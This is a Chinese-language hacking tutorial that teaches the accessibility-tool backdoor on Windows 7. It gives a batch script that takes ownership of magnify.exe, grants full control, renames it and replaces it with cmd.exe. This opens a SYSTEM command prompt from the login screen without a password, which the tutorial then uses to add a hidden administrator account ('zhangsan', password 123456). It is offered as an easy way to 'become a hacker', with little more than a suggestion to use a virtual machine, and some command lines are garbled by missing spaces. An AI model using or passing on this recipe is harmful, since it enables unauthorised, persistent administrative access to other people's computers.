三分钟写一个简单WINDOWS后门

黑客技术听起来十分神秘，但是今天你也可以做一个黑客。三分钟教你写一个简单的黑客脚本。

• 实验环境：

一台Windows 7主机即可（但是，注意，最好不要在物理机上实现这次实验）

• 实验步骤

1.在C盘下建一个test文件夹

2.在test文件夹中新建文件，并新建一个文本文件，修改文件名为back.bat。

3.打开文件进行编辑。输入如下内容。

cd c:\windows\system32

takeown /f magnify.exe

icacls magnify.exe/grant administrators:F

ren magnify.exemagnify_back.exe

copy cmd.exemagnify.exe

保存退出。

4。右击刚才所写的back.bat文件，以管理员身份运行。

以管理员身份运行后，会出现如上的提示界面，选择是，然后会出现一个界面在屏幕上一闪而过。这说明后面此时已经植入了。

5.重启计算机，进入下面这个界面，点击左下角红色方框里面的按钮

6.点击之后会出现一个轻松访问的界面，点击“放大屏幕上的项目（放大镜）”这个选项,然后点击应用，最后点击确定。

此时你会发现在没有输入密码的情况下出现了一个cmd命令行，使用whoami来查看当前用户，发现当前用户居然是system

7.拿到system权限（Windows最高权限），这就意味着你可以为所欲为了。

创建用户zhangsan，并将其加入到administrators组

上面命令创建了zhangsan用户

上述命令是将张三加入到本地管理员组，使其具有更大的权限

8.验证

重启计算机，发现登录用户增加了一个zhangsan

使用用户名zhangsan，密码123456进行登录。发现可以登录。

然后查看zhangsan是否是管理员：计算机->管理->本地用户和组->组->administrators

可以看到，zhangsan的确被加入到administrators组中了。

这样，一个后面就被植入了，以后入侵者就可以以zhangsan用户来登录主机，并且还具有管理员权限。很可怕的奥！